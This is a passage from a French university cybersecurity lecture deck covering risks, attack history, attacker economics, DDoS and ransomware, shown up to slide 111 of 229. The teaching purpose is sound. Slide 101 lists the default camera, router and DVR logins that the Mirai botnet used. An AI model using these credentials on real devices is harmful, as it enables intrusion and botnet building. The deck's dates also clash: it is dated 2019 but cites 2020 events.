la sécurité informatique rtai - dsi · duralexsedlex accèsetmaintien: pénal: art323-1:...
TRANSCRIPT
La sécurité informatique RTAI
Fabrice Prigent
Université Toulouse 1 Capitole
R.T.A.I. Lundi 3 Février 2019
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 1 / 229
"Tu es fort petit, très fort, mais tant que je serais dansle métier, tu ne seras jamais que le second."
The MASK
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 2 / 229
Pirater n’est pas un jeu
Ce que vous apprendrez ici est destiné à la protection, pas àl’attaque. Mais si cela vous amuse :
Certains organismes "anodins" sont sous la protection de laDGSI ou moins conciliant..Quand vous réussissez à pirater un organisme c’est parce que
Il ne fait pas de sécuritéIl a une bonne sécurité, mais avec une faille. Il a donc desjournaux qu’il analyse.Vous avez piraté un Honeypot. Bravo vous êtes sousmicroscope.
Accord international G8-24Gel de situation de police à police,Regularisation judiciaire par la suite.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 3 / 229
Dura Lex Sed Lex
Accès et maintien :Pénal : Art 323-1 : 30 000 e, 2 ans de prisonsi en plus altération : 45 000 e, 3 ans de prisonsi en plus STAD de l’état : 75 000 e, 5 ans de prison
Entrave au système d’information :Pénal : Art 323-2 : 75 000 e, 5 ans de prison.si en plus STAD de l’état : 100 000 e, 7 ans de prison
Possession d’outils de piratage :Pénal : peines identiques aux infractions "possibles".
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 4 / 229
Dura Lex Sed Lex : résumé
Pour résumer"Pas vu, Pas prisVu : Niqué !"
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 5 / 229
Phrases essentielles
"Some rules can be bent,others.... can be broken."Morpheus"Ne pas croire ce que l’on te dit. Toujours re-vérifier" Gibbsrègle n°3"Ne jamais rien prendre pour acquis" Gibbs règle n°8"L’homme intelligent résoud les problèmes, l’homme sage lesévite"
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 6 / 229
Quel est l’objectif de la sécurité informatique ?
Protéger l’informatique ?Intégrité ?Confidentialité ?Disponibilité ?
Empêcher les accès aux utilisateurs ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 7 / 229
En-êtes vous sûrs ?
Distribution d’un malware par votre serveur web ?Notion d ’imagePerte de marchéset pourtant aucun risque informatique
Vol / Destruction d’un serveur ?Protection physique (est-ce votre rôle ?)Sauvegarde
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 8 / 229
La bonne définition
Protéger l’entrepriseY compris sa version non informatique
Internet des objets (caméras,
Par des moyens informatiquesSi vous n’en êtes pas convaincus, essayez d’en convaincre vosinterlocuteurs.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 9 / 229
Comment faire
EvaluerLes difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?
Définir les rôles : politique de sécuritéQui fait quoi, comment et quand ?Qui peut faire quoi, comment et quand ?
Définir un plan d’actionQuelle sont les priorités ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 10 / 229
Évaluer
Les difficultésLe contexteQuels sont les risques ?Quelles sont les menaces ?La sécurité se mesure-t-elle ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 11 / 229
Les difficultés
Génère des désagrémentsL’empêcheur de surfer en rond.
Beaucoup de travailNécessite de fortes compétences
en réseau, en système, en droit, et une remise à niveaupermanente
Coûte de l’argentet ne rapporte rien
Pas de reconnaissanceSi ça marche : "A quoi ça sert ?"Sinon : "Vous êtes nul !"
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 12 / 229
Le contexte : Internet
HistoriqueConnexion de bout en boutRéseau ouvert
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 13 / 229
Historique
1962 : Réseau militaire1968 : Premiers tests réseau à paquets1 Octobre 1969 Arpanet(RFC,UNIX)Septembre 1978 : IPv41991 : Création de WWW par Tim Lee Werners1992 : Découverte d’Internet par le grand public
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 14 / 229
Connexion de bout en bout
les RFC 1122 et 1123 définissent les règles pour les machinesAccessibilité totaleOn fait ce que l’on dit, et l’on dit ce que l’on fait
Signaler quand cela ne marche pasSignaler pourquoi
Système ouvertFingerRexecSendmail
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 15 / 229
Réseau ouvert
Entraide : prêt de ressourcesSendmail → relayage de spamsDNS → saturation de serveurs distants
Assistance au débogageEXPN et VRFY de sendmail → collecte d’informationsXFER DNS → cartographie de réseaux
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 16 / 229
Les risques
Destruction de donnéesPerte de marchésPerte de temps et donc d’argentRisques juridiques
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 17 / 229
Destruction de données
ComptabilitéDonnées clientsR & D, Conception, ProductionLes PME meurent dans les 3 mois.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 18 / 229
Perte de marché
Vol ou divulgation d’informationRecherche et développementFichier client
Dégradation de l’imageModification du site webDivulgation d’informationsPerte de confiance
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 19 / 229
Pertes financière et boursière
Exemple de Yahoo
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 20 / 229
Pertes financière et boursière
Mais ce n’est pas toujours le cas
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 21 / 229
Pertes financière et boursière
Cause ou conséquence ?
http://riskbasedsecurity.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 22 / 229
Perte de temps et donc d’argent
Arrêt de la productionRecherche des causesRemise en état
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 23 / 229
Risques juridiques
Lois françaisesÉchanges illégaux (terrorisme/pédopornographie/P2P),Attaques par rebond,Confidentialité des données personnelles (Article 226-17 etArticle 226-34),
Loi européenneGDPR / RGPD (Règlement européen : 25 Mai 2018).
2 à 4% du chiffre d’affaire mondial10-20 Mepour les administrationsLes résultats du RGPD
ContratsDisponibilité
Lois internationalesLoi Sarbanes-Oxley (US)Réglementation Bâle II
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 24 / 229
Les menaces : attaques
HistoriqueNiveau des attaquesTypes d’attaqueDéroulement d’une attaque
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 25 / 229
Les attaques : pré-historique
1975 : Jon Postel pressent le SPAM→ 1983 : blagues de potaches1983 : WargamesAoût 1986 : Cukoo’s egg (1989) Clifford Stoll : 1er Honeypot.(0.75$)2 Novembre 1988 : Ver de Morris
10% du parc mondial (6000 sur 60000)Création du CERT
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 26 / 229
Les attaques : historique
2001 : Code Rouge24 janvier 2003 : Slammer/Sapphire
(376 octets)doublait toutes les 2,5 secondes90% des hôtes vulnérables infectés en 10 minutes
2004 : Location de zombies2008 : Les Anonymous commencent leurs attaques
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 27 / 229
Les attaques : contemporain
2009 : Conficker (7%, Militaire, 250 K$, MD6).2010 : Opération Aurora, Mariposa (13 M), Comodo, Stuxnet.2011 : Affaire DigiNoTar (certificat *.google.com),2012 : Pacemakers, Piratage de l’Élysée,2013 : PRISM (Snowden), Backdoor DLink2014 : Début des cryptolocker, Shellshock(98), Sony, FIN4,Failles SSL (Poodle, Heartbleed, etc., etc.)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 28 / 229
Les attaques : contemporain 2
2015 : Cyberdjihadisme, Hacking Team, Full HTTPS, AshleyMadison, Backdoor Cisco,2016 : DNC, Méga DDos, IoT, Shadow Brokers,2017 : Cryptominers, Equifax, Accenture, AWS public bucket,Wannacry,2018 : Meltdown et consorts, les bibliothèques(event-stream), memcached et DDoS,2019 : Année ransomware. Russie contrôle son Internet. Lescertificats EV deviennent inutiles,
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 29 / 229
Ashley Madison
Site d’adultère, 36 millions d’utilisateursPiraté le 15 juillet 2015 par Impact Team Wikipédia300 Go de données (nom, mail (pro souvent), mot de passe,adresse, paiements effectués)11 millions de mots de passe chiffrés avec un salted MD55,5 millions de femmes. 70529 bots féminins (43 botsmasculins)Pour plus d’information sur le système Ashley-MadisonThomas Ryan et l’expérience Robin Sage (25 ans et 10 ansd’expérience).
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 30 / 229
Les attaques et événements : 2020
Cryptolocker explose (137 au lieu de 54 grosses cibles enFrance), on verra plus loin.Bezos a vu son smartphone piraté.Les VPN (PulseSecure,Fortinet,SonicWall, etc.) deviennentdes points d’entrée,Faille ZerologonUn porte-monnaie de bitcoin vidé de 1 milliard de $Encrochat: opération police contre un réseau criminelAjout des capacités DDoS et divulgation de données auxransomware.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 31 / 229
Les attaques "rigolotes"
Les faiblesses de l’authentification SMSLe capteur luminosité utilisé pour détecter la TZ d’un clientwebLes capteurs d’orientation des smartphone pour deviner vosmots de passeIOS fitness pulsation cardiaque/ validant les achats grâce à lalecture "au dessus" de l’empreinte digitaleDétecter le mot de passe par les mouvements d’épaule dansZoom ou Teams.Les copier-coller piégés "actifs"
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 32 / 229
Le phénomène Cryptolocker
Le modèle passe de "Tata Jacotte" au "Big Game Hunting"(actuellement 17 M$ pour Compal)Norsk Hydro se fait rançonner, et cela lui coûte 46 M$Altran (AD, cryptolocker + 1 M$ de rançon) se font piraterArrêt de Fleury Michon, l’université de Corse, CHU de Rouen(250K€), Université de Brest.Sopra Steria (spécialiste sécurité, limite les dégâts),Déplacement latéral, accès AD, destruction des snapshots etsauvegarde
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 33 / 229
Le phénomène Cryptolocker 2
Groupes "Etatiques" pour de l’argent: TA505 par exemple.60% par accès RDP, 26% par phishing.3500 extensions différentes des cryptolockeurs.Arrêt de 3 semaine à plusieurs mois.Ajout d’une capacité de "RGPD-Ransomware".Apparition de société style CovewareOn passe, entre l’arrivée et la prise de contrôle complète, de72 heures à 2 heures
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 34 / 229
Hacktivisme
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 35 / 229
Hacktivisme
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 36 / 229
Hacktivisme
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 37 / 229
Hacktivisme
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 38 / 229
Hacktivisme
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 39 / 229
Les attaques : en temps réel
http://map.honeynet.org
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 40 / 229
Les attaques : en temps réel 2
http://cybermap.kaspersky.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 41 / 229
Les attaques : en temps différé
https://zone-h.org
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 42 / 229
Les attaques : en temps différé
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 43 / 229
Les attaques : en devenir
https://www.openbugbounty.org
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 44 / 229
Niveau des attaques
1980 1985 1990 1995 2005 2010 2015
Niveau
Essai de mots de passe
Code Auto-répliquant
Décryptage de mot de passe
Exploitation de vulnérabilités connues
Désactivation des journaux
Backdoor
Exploration de réseau (scan)
Détournement de sessions
Utilisation de SNMP
Interface graphique
Maquillage de paquets Déni de service
Attaques web
Techniques furtives
Obfuscation
Attaques distribuées Réseau C&C P2P
Phishing
Fast Flux
Crypto High tech
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 45 / 229
Type des attaquants : par compétence
Script Kiddy90% playstation 9% clickomane 1% intelligenceutilise ce que font les autres
AmateurFailles connuesFailles web
ProfessionnelEn équipeAvec beaucoup de moyens (financiers, techniques, parfoispréparatoires)0days possibles, voire courants.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 46 / 229
Type des attaquants : par objectif
L’argentpiratage volumétriquecryptolocker/cryptominage
Hacktiviste"Terroriste"Anonymous
EspionsEtatiqueIndustriel
"Petit con"
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 47 / 229
Évolution des attaquants
Ne pas se méprendreSi la moyenne des pirates est plus bête qu’avant,les meilleurs pirates sont bien meilleurs qu’avant
plus psychologues (Social Engineering, virus)plus pragmatiques (Efficacité, Argent)plus techniques.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 48 / 229
Compétences des pros
Voici, selon un rapport de CrowdStrike de 2019 les performancesdes pirates "non occidentaux" et soutenus par de gros sponsors.Groupe Sponsor Temps d’intrusionBear (alias APT-28) Russie 00:18:49Chollima (alias APT-38) Corée du Nord 02:20:14Panda (alias PLA Unit 61398) Chine 04:00:26Kitten (alias APT-34) Iran 05:09:04Spider eCrime 09:42:23
Source https://www.crowdstrike.com, performancesSource https://www.fireye.com, liste des groupes APT
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 49 / 229
But des attaques
Constitution d’un parc de zombiesCampagne de SPAMsCampagne de phishingCampagne de racket
TagCasseVol (codes bancaires, espionnage, marketing agressif)Spyware, Keylogger, cryptolocker etc.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 50 / 229
Économie cybercrimininalité : version simplifiée
Argent
Pirate
Virus
Intrusion
Faille
Disparitionconcurrent
Pirataged’une
entreprise
Site dephishing
ou de ventemédicaments
ChineseTuringFarm
Site"WaterHole"
Espionnage
Vold’identité
Usurpation
Doxing
Déstabilisationd’une entreprise
Vol bancairepar keylogger
FauxCall Center
PseudoAntivirus
FAIbullet proof
Spam Blog
Spam
Game Cracking
Chantagecrédibilisé
par mot de passe
ProtectionServeur Web
Captcha
Protection IPFirewall, Blacklist
Antivirus
PC
Cryptolocker
Cryptominage
Bot
Serveur
XSS
JeuCheat
Ver
DDoS
Massmailing
Racket
SCAM
Phishing
Viagra
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 51 / 229
Économie Virale : quelques chiffresPhreaking téléphonique : 2 000 - 70 000 epar attaque réussie.en 2019, pour un investissement de 500 $ dans un RaaS, onobtient 3000 $ en 3 mois.30% des américains ont acheté après un spam.ROI de "indian herbal" : coût 0,1 centimes, vendu 65 e.Vol d’identité.
Perte estimée pour le vol d’une identité : 400 e(bénéfice pourle pirate : entre 50 et 100 e))en 2007, l’estimation des pertes dues à la cybercriminalité étaitde plus de 1 milliard par an.
Depuis 2007 C.A. cybercriminalité >C.A. drogue. 2018 : 600milliards $Virus locky a rapporté 100 M$.Le "RaaS" Gandcrab se retire après avoir fait payer 2 milliardsde $ aux victimes.Le "Cheat" jeu vidéo rapporterait plus que la cybercriminalitéclassique.Pourquoi les sites porno et les sites proxy sont gratuits ?
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 52 / 229
Proposition d’emploi
et puis il y a Amazon Mechanical Turket puis il y a uncaptcha2 (pour que Google pirate Google)
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 53 / 229
Proposition de services
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 54 / 229
Prix de failles
https://zerodium.com/program.html
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 55 / 229
Prix de failles mobile
https://zerodium.com/program.html
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 56 / 229
Type des attaques
Déni de service (saturation, D.O.S. ou D.D.O.S.)Phishing, spear phishingInfection (cryptolocker, mots de passe bancaires).Piratage webIntrusion réseau (APT)...
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 57 / 229
Attaque D.O.S.
Deny Of Service ou Déni de service. Plusieurs principes defonctionnement
Le harcèlementOccupation permanente de la ligne
Le livreur de pizzasAppel de plusieurs livreurs pour une fausse adresseVoir backscatter pour le repérage
Le chewing gum dans la serrure
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 58 / 229
Attaque D.D.O.S.
Distributed Deny Of Service ou déni de service distribué.D.O.S. appliqué par plusieurs (dizaines de milliers de)machinesGénéralement de type "livreur de pizzas"Rarement évitable (sauf par des sociétés internationalesspécialisées)Volume maximal actuel :
1 Tbit/s (19 septembre 2016)1.35 Tbit/s par de serveurs memcached (mars 2018)2.5 Tbit/s sur Google en 2017 (annoncé en octobre 2020)https://www.ovh.com/fr/blog/cybersecurite/
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 59 / 229
Evolution des DDoS
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 60 / 229
Déni de service contre akamaï avec memcached
source https://www.bleepingcomputer.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 61 / 229
Type de D.O.S.
Saturation de la bande passante (UDP)10000 zombiesImpossible de lutter seul (se "cacher" derrière OVH,CloudFlare, etc.)
Saturation de la table des connexions (TCP)1000 zombiesLutte : utilisation des syncookies
Saturation du nombre processus100 zombies mais les machines sont "grillées", connaissanceminimaleLutte : limitation du nombre de processus, repérage et blocagetrès tôt
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 62 / 229
Type de D.O.S.
Saturation de la CPU10 zombies mais les machines sont "grillées", connaissancespointuesexemple: requêtes SQL massiveLutte : limitation de la CPU (noyau), mod_evasive (http)
Plantage distant1 zombie. Expertise nécessaireEmpoisonnement des caches CDNPatch régulier, durcissement noyau, protection applicative
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 63 / 229
Et si kon ve fer mé kon sé pa
source http: // www. ddosservice. com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 64 / 229
Piske ma copine me quitte, je DDoS
sourcehttps: // pasillo. renater. fr/ weathermap/ weathermap_metropole. html
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 65 / 229
La protection DDoS
Elle se prépare, comme toute gestion de crise.Savoir ce que l’on est prêt à sacrifier (ou pas)
En terme de correspondantsEn terme de services
Les procéduresLes concevoir (qui fait quoi comment, les interlocuteurs)Les rédigerLes valider
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 66 / 229
La protection DDoS
Elle est multi-niveauxVolumétrique (FAI)Connexion (Réseau)Applicative (Développement)
Elle a ses risques propresPerte localisée de connexion (syncookie)Latence en régime de croisière (limitesCPU/process/RAM/disque)Risque d’interception "high level" : cloudflare / OVH / etc.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 67 / 229
Pause TP : DDoS
Résumez en 5 lignes cette page webhttps://www.ovh.com/fr/blog/rapport-attaques-ddos-observees-par-ovh-en-2017/
Trouvez un tarif actuel pour du DDoS
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 68 / 229
Déroulement d’attaque phishing
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 69 / 229
Déroulement d’attaque infection
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 70 / 229
Déroulement d’attaque infection / protection
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 71 / 229
Déroulement d’attaque infection contournement
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 72 / 229
Déroulement d’attaque intégration botnet
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 73 / 229
Déroulement d’attaque infection pour Spam/Virus
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 74 / 229
Déroulement d’attaque infection pour DDoS
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 75 / 229
Déroulement d’un piratage web
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 76 / 229
Déroulement d’un piratage réseau
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 77 / 229
Cryptolockeur simple
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 78 / 229
Cryptolockeur lourd
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 79 / 229
Déroulement d’une attaque intrusion
Collecte d’informationsRepérage des vulnérabilitésUtilisation des vulnérabilités → intrusionAccession aux droits administrateur (escalade)CamouflageInstallation d’une backdoor
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 80 / 229
Collecte des informations
Par "social engineering" ou manipulation psycho-relationnellePar ingénierie informationnellePar interrogation TCP/IP
Scan (de ports ou de machines)Rapide/lentClassique/furtif
Interrogation des servicesCartographie DNSRécupération des versionsRécupération des options
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 81 / 229
Attaques : quelques statistiques à l’UT1
Ces chiffres sont des moyennes en 20201000 tests par seconde ( 170 millions par jour )2 à 5 campagnes de phishing par jour.
Plus quelques pointes.95 000 tests par seconde pendant 72 h en 2015400 000 tests par seconde pendant 2 heures en 2019450 000 tests par seconde pendant 20 minutes en 2020
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 82 / 229
Attaques : incidents à l’UT1
106 incidents de sécurité depuis 14 ans dont1 cryptolocker18 incidents de phishing57 virus (sortants ou crypto) sur des postes2 intrusions automatiques (vers) sur des serveurs1 boite noire piratée (ShellShock)2 "DDoS" réussis en Février 2015.
Année Total Virus Phishing Autres Commentaires2020 13 4 0 9 Cryptolocker, HIBP2019 22 8 2 12 Escroquerie, HIBP2018 18 8 2 8 Piratage serveurs, HIBP2017 8 3 4 1 Parasitisme avancé2016 12 6 1 5 3 DoS, 2 extorsions2015 16 8 4 4 2 DoS
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 83 / 229
Attaques : nombre mensuel de tests
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. 0
10 k
20 k
Infractions sur 1 mois
RRDTOOL / TOBI OETIKER
Infractions sortantes par seconde Infractions entrantes par seconde
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 84 / 229
Attaques : nombre d’attaquants
dim. mar. jeu. sam. lun. mer. ven. dim. mar. jeu. sam. lun. mer. ven. dim. 0
1 k
2 k
3 k
4 k
5 k
6 k
7 k
8 k
Quarantaine sur 1 mois
RRDTOOL / TOBI OETIKER
Quarantaine en sortie par heure Quarantaine en entree par heure
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 85 / 229
Attaques : raisons de la quarantaine sur une journée
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 86 / 229
Pourquoi les services sont vulnérables ?
Mauvaise conception (volontaire ou non)Peace and Love : REXECBackdoor : FSP,EGGDropIncompétence : WEPComplexité : OpenSSL, Bash, WPA2
Mauvaise configurationpostfix, DNS, HTTP
Mauvaise utilisationScripts php, cgi-bin incorrects
Mauvais utilisateursClickophileManque d’intelligence entre la chaise et le clavier
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 87 / 229
Heureusement
C’est super dur de trouver des failles
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 88 / 229
Site de recensement de failles
source http: // www. cvedetails. com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 89 / 229
Heureusement
C’est super dur de trouver comment exploiter des failles
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 90 / 229
Site d’utilisation de failles
source http: // www. exploit-db. com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 91 / 229
Mais on l’a déjà vu çui-là ?
source http: // www. openbugbounty. com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 92 / 229
Plus méchant : distribution de icepack
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 93 / 229
Heureusement
Les antivirus nous protègent.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 94 / 229
Les antivirus
Exemple de Virustotal
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 95 / 229
M’en fous
je ne prends que des logiciels / codes / applications signés
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 96 / 229
Le code signing
sourcehttps://www.bleepingcomputer.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 97 / 229
Heureusement
Les entreprises informatiques savent faire
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 98 / 229
Vulnérabilités d’Octobre 2020
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 99 / 229
Vous voulez prendre le contrôle de caméras (Mirai)?
source https://krebsonsecurity.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 100 / 229
Version plus lisibleMatériel Login PasswordACTi IP Camera admin 123456ANKO Products DVR root ankoAxis IP Camera root passDahua Camera root vizxvDahua DVR root 888888Dahua DVR root 666666Dahua IP Camera root 7ujMko0vizxvDahua IP Camera root 7ujMko0adminDahua IP Camera 666666 666666Dreambox TV receiver root dreamboxEV ZLX Two-way Speaker root zlxxGuangzhou Juan Optical root juantechH.264 – Chinese DVR root xc3511HiSilicon IP Camera root klv1234HiSilicon IP Camera root jvbzdIPX-DDK Network Camera root adminIQinVision Cameras root systemMobotix Network Camera admin meinsmPacket8 VOIP Phone root 54321Panasonic Printer root 00000000RealTek Routers root realtekSamsung IP Camera admin 1111111Shenzhen Anran Security Camera root xmhdipcSMC Routers admin smcadminToshiba Network Camera root ikwbUbiquiti AirOS Router ubnt ubntVideoIQ supervisor supervisorVivotek IP Camera root <none>Xerox printers admin 1111ZTE Router root Zte521
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 101 / 229
Microsoft et ses vulnérabilités
Liste des vulnérabilités
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 102 / 229
Microsoft vous protège du flash
Parce que Flash c’est, en moyenne, 60 vulnérabilités critiquespar anMais quand même Facebook, c’est des potes, comme
music.microsoft.compoptropica.comvudu.comet 54 autres sites.
source https://www.scmagazine.comsource https://cvedetails.com
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 103 / 229
Heureusement
Les grosses entreprises ne se font jamais pirater.
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 104 / 229
Les plus grosses fuites de données
source http: // www. informationisbeautiful. net
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 105 / 229
Ma banque elle, elle risque rien
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 106 / 229
Ma banque elle, elle risque rien
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 107 / 229
Les entreprises piratées assument
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 108 / 229
Les entreprises piratées assument
Un client du FAI VirginMedia demande une RAZ de son motde passe.Virginmedia lui envoie son ancien mot de passe en clair parmail !Le client s’en offusqueRéponse :
Posting it to you is secure, as it’s illegal to open someone else’smail. JGS— Virgin Media (virginmedia) August 17, 2019
Thank god criminals don’t break laws.— Joseph Cox (josephfcox) August 17, 2019
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 109 / 229
Les entreprises piratées assument
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 110 / 229
Les entreprises piratées assument (2)
Un générateur d’excuses en bois
Fabrice Prigent La sécurité informatique RTAI/ R.T.A.I. Lundi 3 Février 2019 111 / 229
Mais on a des instances pour nous protéger
